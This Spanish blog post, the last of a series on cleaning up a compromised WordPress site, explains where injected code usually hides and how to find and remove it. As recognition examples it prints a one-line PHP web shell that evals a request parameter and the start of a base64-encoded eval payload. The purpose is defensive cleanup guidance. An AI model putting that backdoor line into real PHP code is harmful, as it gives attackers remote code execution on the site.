En entradas anteriores vimos cómo saber si tu sitio WordPress está infectado, y la primera parte de cómo limpiar un sitio WordPress infectado, donde separamos los datos más importantes de aquellas carpetas que se pueden borrar y sustituir sin problema.

En este último post de la serie vamos a localizar el código malicioso y por supuesto a borrarlo.

BUSCANDO CÓDIGO MALICIOSO EN WORDPRESS

Los archivos footer.php y header.php (dentro de la carpeta wp-content/themes/tu tema activo) suelen ser los preferidos para incrustar el código malicioso. Pero en realidad puedes tener infectado cualquier archivo.

En este momento toca abrir cada uno de los archivos para buscar la infección. Puedes utilizar tu editor de código preferido como Notepad++ o cualquier otro.

Esta parte es la más complicada ya que necesitas tener algún conocimiento sobre código PHP y Javascript para saber distinguir entre código malicioso y código de confianza.

¿QUÉ ASPECTO TIENE UN VIRUS DE WORDPRESS?

Estos son algunos de los ejemplos que me he encontrado sitios WordPress infectados:

if(isset($_REQUEST["cmd"])){eval(stripslashes($_REQUEST["cmd"]));die();}

Este código se situa en el archivo search.php de tu tema y permite al atacante ejecutar código en tu sitio gracias a la función eval. 


 

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWR
lcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVF
RQX1JFRkVSRVInXTsNCiR1YWc9J...

Este otro código es de los más habituales, se suele incrustar al comienzo del archivo infectado. Es fácilmente reconocible ya que este virus es codificado con la función base64 creando una larga cadena de números y letras. Si quieres estar seguro de que se trata de un virus puedes descodificarlo en esta web.


 

Ante la duda siempre puedes comparar el archivo con una versión recién descargada de la web del desarrollador del tema o del repositorio de WordPress.

Un vez que tengas localizado el código malicioso puedes eliminarlo teniendo cuidado con no borrar parte del código legítimo.

Una herramienta que suelo utilizar para buscar y reemplazar una cadena de texto en diferentes archivos es esta herramienta llamada find and replace.

ACABANDO LA LIMPIEZA

Es difícil determinar si has conseguido eliminar la infección por completo, por lo que es recomendable hacer un seguimiento del sitio durante los días o semanas siguientes.

Si tu sitio ha sido marcado como spam (puedes comprobarlo con esta herramienta de Sucuri) deberás ponerte en contacto con esas empresas para que te saquen de esa lista negra.